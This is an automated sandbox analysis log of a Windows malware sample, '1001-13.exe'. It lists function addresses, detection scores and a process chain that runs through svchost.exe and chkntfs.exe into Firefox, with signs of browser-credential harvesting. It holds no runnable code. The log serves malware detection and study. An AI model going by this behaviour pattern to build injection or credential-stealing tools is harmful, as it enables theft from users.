                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04653ADC7_2_04653ADC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04653C777_2_04653C77
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04653C827_2_04653C82
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_046748B27_2_046748B2
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465592A7_2_0465592A
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_046559327_2_04655932
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465E1C27_2_0465E1C2
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04655B527_2_04655B52
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04653B327_2_04653B32
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465C3C27_2_0465C3C2
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465C3BD7_2_0465C3BD
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0493E4F68_2_0493E4F6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049424468_2_04942446
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049505918_2_04950591
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048905358_2_04890535
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048AC6E08_2_048AC6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0488C7C08_2_0488C7C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048B47508_2_048B4750
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048907708_2_04890770
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049501AA8_2_049501AA
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049481CC8_2_049481CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048801008_2_04880100
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0492A1188_2_0492A118
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049181588_2_04918158
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049102C08_2_049102C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049302748_2_04930274
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049503E68_2_049503E6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0489E3F08_2_0489E3F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494A3528_2_0494A352
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04930CB58_2_04930CB5
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04880CF28_2_04880CF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04890C008_2_04890C00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048A8DBF8_2_048A8DBF
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0488ADE08_2_0488ADE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0489AD008_2_0489AD00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494CE938_2_0494CE93
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048A2E908_2_048A2E90
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494EEDB8_2_0494EEDB
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494EE268_2_0494EE26
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04890E598_2_04890E59
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0490EFA08_2_0490EFA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04882FC88_2_04882FC8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0489CFE08_2_0489CFE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048D2F288_2_048D2F28
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048B0F308_2_048B0F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04904F408_2_04904F40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048768B88_2_048768B8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048BE8F08_2_048BE8F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0489A8408_2_0489A840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048928408_2_04892840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048929A08_2_048929A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0495A9A68_2_0495A9A6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048A69628_2_048A6962
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0488EA808_2_0488EA80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04946BD78_2_04946BD7
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494AB408_2_0494AB40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494F43F8_2_0494F43F
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048814608_2_04881460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0492D5B08_2_0492D5B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049475718_2_04947571
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049416CC8_2_049416CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494F7B08_2_0494F7B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048970C08_2_048970C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0493F0CC8_2_0493F0CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494F0E08_2_0494F0E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049470E98_2_049470E9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0489B1B08_2_0489B1B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C516C8_2_048C516C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0487F1728_2_0487F172
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0495B16B8_2_0495B16B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048952A08_2_048952A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048AB2C08_2_048AB2C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_049312ED8_2_049312ED
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048D739A8_2_048D739A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494132D8_2_0494132D
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0487D34C8_2_0487D34C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494FCF28_2_0494FCF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04909C328_2_04909C32
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048AFDC08_2_048AFDC0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04893D408_2_04893D40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04941D5A8_2_04941D5A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04947D738_2_04947D73
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04899EB08_2_04899EB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04891F928_2_04891F92
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494FFB18_2_0494FFB1
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494FF098_2_0494FF09
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048938E08_2_048938E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048FD8008_2_048FD800
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048999508_2_04899950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048AB9508_2_048AB950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048D5AA08_2_048D5AA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0492DAAC8_2_0492DAAC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0493DAC68_2_0493DAC6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04947A468_2_04947A46
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494FA498_2_0494FA49
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04903A6C8_2_04903A6C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048AFB808_2_048AFB80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_04905BF08_2_04905BF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048CDBF98_2_048CDBF9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0494FB768_2_0494FB76
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_005826A08_2_005826A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0059C4608_2_0059C460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057D4D88_2_0057D4D8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057D4E08_2_0057D4E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057B6E08_2_0057B6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057D7008_2_0057D700
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057B8308_2_0057B830
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0057B8258_2_0057B825
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00585D708_2_00585D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00583F708_2_00583F70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00583F6B8_2_00583F6B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_045FE4B38_2_045FE4B3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_045FE3988_2_045FE398
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_045FE8508_2_045FE850
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_045FD9188_2_045FD918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
                Source: C:\Users\user\Desktop\1001-13.exeCode function: String function: 00E39CB3 appears 31 times
                Source: C:\Users\user\Desktop\1001-13.exeCode function: String function: 00E50A30 appears 46 times
                Source: C:\Users\user\Desktop\1001-13.exeCode function: String function: 00E4F9F2 appears 40 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 048FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0490F290 appears 105 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0487B970 appears 272 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 048D7E54 appears 98 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 048C5130 appears 36 times
                Source: 1001-13.exe, 00000000.00000003.2144236729.00000000039C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1001-13.exe
                Source: 1001-13.exe, 00000000.00000003.2144392483.0000000003D2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1001-13.exe
                Source: 1001-13.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/8
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA37B5 GetLastError,FormatMessageW,0_2_00EA37B5
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E910BF AdjustTokenPrivileges,CloseHandle,0_2_00E910BF
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E916C3
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EA51CD
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EBA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EBA67C
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00EA648E
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E342A2
                Source: C:\Users\user\Desktop\1001-13.exeFile created: C:\Users\user\AppData\Local\Temp\outbluffedJump to behavior
                Source: 1001-13.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chkntfs.exe, 00000008.00000003.2812931265.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2812987116.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2814574961.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2814574961.0000000000B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1001-13.exeVirustotal: Detection: 61%
                Source: 1001-13.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\1001-13.exe "C:\Users\user\Desktop\1001-13.exe"
                Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"Jump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: dnsapi.dllJump to behavior
